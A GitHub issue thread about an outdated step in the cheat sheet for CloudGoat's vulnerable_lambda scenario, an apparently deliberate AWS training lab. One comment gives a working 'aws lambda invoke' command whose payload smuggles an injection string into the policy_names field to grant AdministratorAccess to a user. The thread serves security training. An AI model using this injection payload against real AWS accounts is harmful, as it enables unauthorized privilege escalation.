vulnerable_lambda cheat sheet not up to date

RhinoSecurityLabs / cloudgoat

CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool

BSD 3-Clause "New" or "Revised" License

2.98k stars 626 forks source link

vulnerable_lambda cheat sheet not up to date #197

Closed cyberqueenmeg closed 10 months ago

cyberqueenmeg commented 1 year ago

Hi,

Step 5 of vulnerable_lambda in the cheat sheet is out of date. From what I can discern, the --cli-binary-format tag does not exist in the aws lambda invoke command anymore, making the command fail. I tried removing the tag and it still did not work because the payload is not in JSON.

duckbillsecurity commented 1 year ago

Hi, I managed to get working by replacing the [ ] with " " around bilbo_user_name_here

aws --profile assumed_role --region us-east-1 lambda invoke --function-name [policy_applier_lambda_name] --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": "bilbo_user_name_here"}' out.txt

jdearmas commented 10 months ago

Hello @cyberqueenmeg, hope you are well!

My findings align with @duckbillsecurity (thank you for your research).

The aws lambda invoke command accepted the --cli-binary-format when I tried.

Can you post what version of the AWS CLI you have?

Mine was: aws-cli/2.7.33 Python/3.9.11 Windows/10 exe/AMD64 prompt/off

If you update your AWS CLI version and still see an error, I would recommend trying the steps outlined in this pull request: #243.

I'll close this issue for now since I can't reproduce it, but if you still have it we reopen it 👍